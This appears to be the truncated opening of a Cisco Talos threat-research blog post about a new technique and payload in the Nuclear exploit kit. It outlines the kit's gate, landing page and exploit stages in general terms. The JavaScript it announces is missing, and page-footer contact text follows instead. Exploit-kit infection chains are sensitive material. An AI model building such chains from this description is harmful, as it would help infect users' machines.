Introduction
Exploit kits are constantly compromising users, whether it’s via malvertising or compromised websites, they are interacting with a large amount of users on a daily basis. Talos is continuously monitoring these exploit kits to ensure protection, analyze changes as they occur, and looking for shifts in payloads. Yesterday we observed a new technique in the Nuclear kit and found a new payload and technique we’ve not seen before.
Details
It’s been awhile since we’ve discussed Nuclear so let’s start with an overview of how users are infected. Like most exploit kits it has a couple of key components: a gate, a landing page, and an exploit page with payload. Let’s start by describing the gate that we have been observing associated with Nuclear and specifically this instance associated to a novel payload.
Gate
This particular infection begins with a compromised website. Buried on the website is a couple lines of javascript, which you can find below:
CONNECT WITH CISCO
LET US HELP
Call us: 1.800.553.6387 - Ext 118
US/Can | 5am-5pm Pacific Other Countries